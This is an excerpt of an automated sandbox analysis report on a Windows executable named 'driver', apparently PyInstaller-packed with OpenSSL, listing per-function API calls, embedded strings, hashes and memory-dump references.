                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35D17C32A497418AEB20DB66D4453AD37A4FB45B8CF500136EE8D97B9BDFB8E490D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007A3420ErrorLast
                                                                                                                                                                                                                                                • String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
                                                                                                                                                                                                                                                • API String ID: 3659664395-502574948
                                                                                                                                                                                                                                                • Opcode ID: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                                • Instruction ID: 34247578805ba1254ea9005590f55a09cddfc197b22d121f29cf5252778762b4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e1670e1f7658ee105d96da9602f9016c1545a8356d93c4e666a0015e6880cd8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C191A461A0E68265FF54AB11A4153BAA751EF94BC4F445031EE8E0BBD6DF3CE4218B3C
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,000001C0EBD18F78,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEEFC
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6A29CF11A,?,?,000001C0EBD18F78,00007FF6A29CADC3,?,?,?,00007FF6A29CACBA,?,?,?,00007FF6A29C5FAE), ref: 00007FF6A29CEF08
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction ID: e8aba44b315e9c6144e1426126274685ff4973418fb03f16126bd091c7a368a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66412361B9AA0245FA15CB1798106752291BF49FD8F884139ED5EC778AEEBCF804A300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6A29B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction ID: b03ee444e7dfb5ca23af1030333177d7dc886f056d7cf53708ae0acf53684745
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C031C322B49B4142E620AB26A8542AB6695BF88FDDF400136EF4DD375ADF7CD506D300
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                                                                                                • API String ID: 0-1087561517
                                                                                                                                                                                                                                                • Opcode ID: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                • Instruction ID: 4d9e43d53d9f6bac4d3e2eb89621123a7a446dc6f6e38435d5819cfe60672ef4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b04bc961801d08b794c6a8917a6a781b33b1234d7739c92a3603f12c1ead9c39
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26D15A62B4EA43A5FF10AA6295527BD22A1EF45BC4F844031DD4E4BBC6DF3CE4218738
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                                                                                                • API String ID: 0-2528746747
                                                                                                                                                                                                                                                • Opcode ID: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                • Instruction ID: 7a3af74d2f64711c66feb0c8660a370b6075fedec3f3cf47efbd45faf3adc4d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f42cd0ca9d563b7a34cad851de025c8784a984462c6c2d3db3bf0c7bae4a17b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5DB15C61B0A682A9FF10EB51D8412BD67A5EF847C4F408032DD0D4BAD6DF7CE6258B78
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDBD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDCB
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDF5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE63
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE6F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction ID: 6fb9187e514338b17109fd4e8eeedf04451747e1992d089788ffda96768a1d8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3131C225B4BA0281EE129B03A81057523D4FF58FA8F494535DD1D8B787EFBCE444A324
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6A29B351A,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B2AA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction ID: 1830cea742d7ff759bdc423e423cafd9551ad5159999ef12c03b485e4b678c7b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E21A332A5A78182E6209B62F4417E66394FB88BC8F400136EE8C9365ADFBCD5459700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                • Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                • Instruction ID: 41ece37a4328fe3f6e51a6a49f81d5a84e2f04b7c11ff0dbe27ce9ef364b58b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06217431B4D64242EB109B96F45423AA3E1FF85FA8F500235EA6D83AEADFFCD4449700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                                • Instruction ID: c20b891bb48f0ce348f93c0f3e3481852e5ce6b0160f645aa80b9a1a8ea36ff4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79219F20E8F2424AFA68A763966527D61435F64FBCF404734D93EC7ADBDEACB440A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction ID: 39731ba6fb0802c0d1220f5abc0855caa74505b38164f0b7dc7ad03596006346
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37114932A59B4286E7508B53E85432963E1FB98FE8F044234EA5DC77A6DFBCD844A740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447484516.00007FF8A8041000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A8040000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447355194.00007FF8A8040000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80ED000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A80F8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447484516.00007FF8A8103000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447962747.00007FF8A8107000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448032483.00007FF8A8109000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8040000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C61208
                                                                                                                                                                                                                                                • String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
                                                                                                                                                                                                                                                • API String ID: 3535234312-1635961163
                                                                                                                                                                                                                                                • Opcode ID: c6821a383222e6fa30d2e0f4eea8c61ca47568722241768c4b415a5a37fba74c
                                                                                                                                                                                                                                                • Instruction ID: 6fd28431b02f905c55d470424f58c9dae13733b55db9bb99c091fe809e8203a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6821a383222e6fa30d2e0f4eea8c61ca47568722241768c4b415a5a37fba74c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B002A172A0AA8695EB608B15E4403BEB7A0FB84BC4F148136DE8D477D5DF3CE561C728
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                                                                                                                                                                                                                • API String ID: 22509725-1299490920
                                                                                                                                                                                                                                                • Opcode ID: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
                                                                                                                                                                                                                                                • Instruction ID: 72d15d6c964161bc28ea556ca6d798aa698a110c98b95237c16186dc81482fa6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42839b2f95b9c923c0519508061ddd42293effc3ab569f72f0bfea2cc60866dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F02BC62A0AB85A3FB548B11E44837A77A1FB88BD4F046231DE4D07B95EF3CE441C364
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8592
                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B85E9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8678
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86E4
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86F5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B870A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
